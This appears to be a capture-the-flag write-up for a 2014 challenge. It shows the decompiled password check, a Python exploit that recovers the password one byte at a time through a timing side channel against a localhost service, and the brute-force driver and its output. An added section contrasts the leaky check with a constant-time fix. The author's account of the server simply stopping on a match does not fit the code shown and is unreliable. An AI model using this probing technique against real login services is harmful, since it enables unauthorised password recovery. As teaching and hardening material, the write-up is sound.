A challenge that got solved by just trying this and that.
*The password and flag in this post have been made up.
```c
while ( 1 )
{
    /* keep reading until exactly 12 bytes (plus terminator) are in the buffer */
    do
    {
        read(fd, &v14, 15u);
        LOBYTE(v17) = 0;
    }
    while ( strlen(&v14) != 12 );

    /* v7 counts the positions where the input byte equals the password byte */
    v7 = 0;
    for ( i = 0; i <= 11; ++i )
    {
        if ( password[i] == *(&v14 + i) )
            ++v7;
    }
    if ( v7 == 12 )
        break;                      /* every byte matched: fall through and send the flag */

    /* 0xDEADBEEE iterations of busy work per matching byte: the reply is
       delayed in proportion to how many bytes of the guess were right */
    randValue = rand() % 1000;
    for ( j = 0; j < v7; ++j )
    {
        for ( k = 1; k <= 0xDEADBEEE; ++k )
            randValue = k ^ (k + randValue);
    }
    sprintf(&s, "%x\n", randValue);
    write(fd, &s, strlen(&s));
}
write(fd, flag, strlen(flag));
```
Feeding it the password stored in password.txt makes the flag appear.
I honestly thought this was a challenge about somehow decrypting the random value, but it didn't seem to be that kind of problem.
While experimenting I noticed that when I sent a 12-byte string containing a particular value, the program did not return a string and simply stopped; it seemed to happen whenever it hit a byte of the password.
(If all 12 bytes matched it would print the flag, of course.)
So I sent values one byte at a time and took the point where it stopped as the password byte for that position.
I then wrote two programs: at the point where it stops, press Ctrl + C and move on to the next position, recovering the password one byte at a time to get the flag.
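As an added example that is not part of the original write-up, here is the decompiled comparison recreated in Python beside a constant-time version. The 0xDEADBEEE-iteration delay loop is replaced by a returned iteration count so the leak can be measured offline; the password and attempts are constructed sample values (the write-up's password is itself made up).

```python
import hmac

PASSWORD_LEN = 12
DELAY_PER_MATCH = 0xDEADBEEE   # inner-loop iterations per matching byte, from the decompiled code


def leaky_check(password: bytes, attempt: bytes):
    """Recreates the decompiled check. Returns (accepted, delay_iterations).

    The server counts every position where attempt[i] == password[i] (v7) and
    then spins 0xDEADBEEE iterations per match before answering, so the
    response time grows linearly with the number of correct bytes.
    """
    if len(attempt) != PASSWORD_LEN:
        return None          # the do/while re-reads until exactly 12 bytes arrive
    matched = sum(1 for a, b in zip(password, attempt) if a == b)
    if matched == PASSWORD_LEN:
        return True, 0       # break out of the loop and send the flag
    return False, matched * DELAY_PER_MATCH


def constant_time_check(password: bytes, attempt: bytes):
    """Hardened variant: constant-time comparison and no data-dependent delay."""
    if len(attempt) != PASSWORD_LEN:
        return None
    return hmac.compare_digest(password, attempt), 0


def delay_profile(check, password: bytes, attempts):
    """Distinct delay values observed across attempts. A side-channel-free
    check yields exactly one value; the leaky check yields one per match count."""
    return {check(password, a)[1] for a in attempts}


# Constructed sample values (hypothetical; the real password is not known).
SAMPLE_PASSWORD = b"CanYouSeeMe?"
SAMPLE_ATTEMPTS = [
    b"\x80" * 12,                    # 0x80 can never match a printable password byte
    b"C" + b"\x80" * 11,             # one correct byte at index 0
    b"Can" + b"\x80" * 9,            # three correct bytes
    b"CanYouSeeMe!",                 # eleven correct bytes, still rejected
]

if __name__ == "__main__":
    print("leaky   :", sorted(delay_profile(leaky_check, SAMPLE_PASSWORD, SAMPLE_ATTEMPTS)))
    print("hardened:", sorted(delay_profile(constant_time_check, SAMPLE_PASSWORD, SAMPLE_ATTEMPTS)))
```

With the leaky check every distinct match count produces a distinct delay, which is exactly what makes the single-byte probing in this write-up work; the hardened check answers every wrong guess in the same time.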
```python
from socket import *
import sys


def setSock(ip, port):
    s = socket(AF_INET, SOCK_STREAM)
    s.connect((ip, port))
    return s


def exploit(n, s):
    print s.recv(1024)          # banner: "The password consists of 12 printable characters"
    n = int(n)                  # index (0-11) of the password byte to recover
    Unprintable = chr(128)      # 0x80 never equals a printable password byte
    for i in range(ord('!'), 0x80):
        # 12-byte guess: 0x80 everywhere except the candidate at index n
        password = Unprintable * n
        password += chr(i)
        password += Unprintable * (11 - n)
        print chr(i)
        s.send(password + "\n")
        s.recv(128)             # blocks for a long time when the candidate is right


if __name__ == "__main__":
    sock = setSock("localhost", 7026)
    exploit(sys.argv[1], sock)
```
The bytes before and after the guessed position were set to 128 (0x80) because the challenge says the password is printable. Since 128 falls outside the ASCII range I assumed it is unprintable.
(I don't know what the password actually was in the real competition.)
```python
import os

# run exploit.py once per password index; each run is stopped with Ctrl + C
# as soon as it blocks on the correct byte
for i in range(12):
    command = "python exploit.py " + str(i)
    os.system(command)
```
Running brute.py (the script above) produces the following output.
```
root@Kali ~/s/e/v/100# python brute.py
The password consists of 12 printable characters
....(omitted)
A
B
C
^CTraceback (most recent call last):
  File "exploit.py", line 28, in <module>
    exploit(sys.argv[1], sock)
  File "exploit.py", line 24, in exploit
    s.recv(128)
KeyboardInterrupt
The password consists of 12 printable characters
....(omitted)
`
a
^CTraceback (most recent call last):
  File "exploit.py", line 28, in <module>
    exploit(sys.argv[1], sock)
  File "exploit.py", line 24, in exploit
    s.recv(128)
KeyboardInterrupt
The password consists of 12 printable characters
....(omitted)
l
m
n
^CTraceback (most recent call last):
  File "exploit.py", line 28, in <module>
    exploit(sys.argv[1], sock)
  File "exploit.py", line 24, in exploit
    s.recv(128)
KeyboardInterrupt
The password consists of 12 printable characters
....(omitted)
W
X
Y
^CTraceback (most recent call last):
  File "exploit.py", line 28, in <module>
    exploit(sys.argv[1], sock)
  File "exploit.py", line 24, in exploit
    s.recv(128)
KeyboardInterrupt
The password consists of 12 printable characters
....(omitted)
m
n
o
^CTraceback (most recent call last):
  File "exploit.py", line 28, in <module>
    exploit(sys.argv[1], sock)
  File "exploit.py", line 24, in exploit
    s.recv(128)
KeyboardInterrupt
The password consists of 12 printable characters
....(omitted)
s
t
u
^CTraceback (most recent call last):
  File "exploit.py", line 28, in <module>
    exploit(sys.argv[1], sock)
  File "exploit.py", line 24, in exploit
    s.recv(128)
KeyboardInterrupt
The password consists of 12 printable characters
....(omitted)
Q
R
S
^CTraceback (most recent call last):
  File "exploit.py", line 28, in <module>
    exploit(sys.argv[1], sock)
  File "exploit.py", line 24, in exploit
    s.recv(128)
KeyboardInterrupt
The password consists of 12 printable characters
....(omitted)
c
d
e
^CTraceback (most recent call last):
  File "exploit.py", line 28, in <module>
    exploit(sys.argv[1], sock)
  File "exploit.py", line 24, in exploit
    s.recv(128)
KeyboardInterrupt
The password consists of 12 printable characters
....(omitted)
c
d
e
^CTraceback (most recent call last):
  File "exploit.py", line 28, in <module>
    exploit(sys.argv[1], sock)
  File "exploit.py", line 24, in exploit
    s.recv(128)
KeyboardInterrupt
The password consists of 12 printable characters
....(omitted)
K
L
M
^CTraceback (most recent call last):
  File "exploit.py", line 28, in <module>
    exploit(sys.argv[1], sock)
  File "exploit.py", line 24, in exploit
    s.recv(128)
KeyboardInterrupt
The password consists of 12 printable characters
....(omitted)
c
d
e
^CTraceback (most recent call last):
  File "exploit.py", line 28, in <module>
    exploit(sys.argv[1], sock)
  File "exploit.py", line 24, in exploit
    s.recv(128)
KeyboardInterrupt
The password consists of 12 printable characters
....(omitted)
=
>
?
^CTraceback (most recent call last):
  File "exploit.py", line 28, in <module>
    exploit(sys.argv[1], sock)
  File "exploit.py", line 24, in exploit
    s.recv(128)
KeyboardInterrupt
```
Combining the values obtained gives the following password.
```
CanYouSeeMe?
```
```
The password consists of 12 printable characters
CanYouSeeMe?
flag is {VolgaCTF 2014 Quals Vuln100}
```
*The password and flag have been made up.
+ Looking at other writeups, it seems something does get printed when the byte matches.. what is it.. why does mine just stop..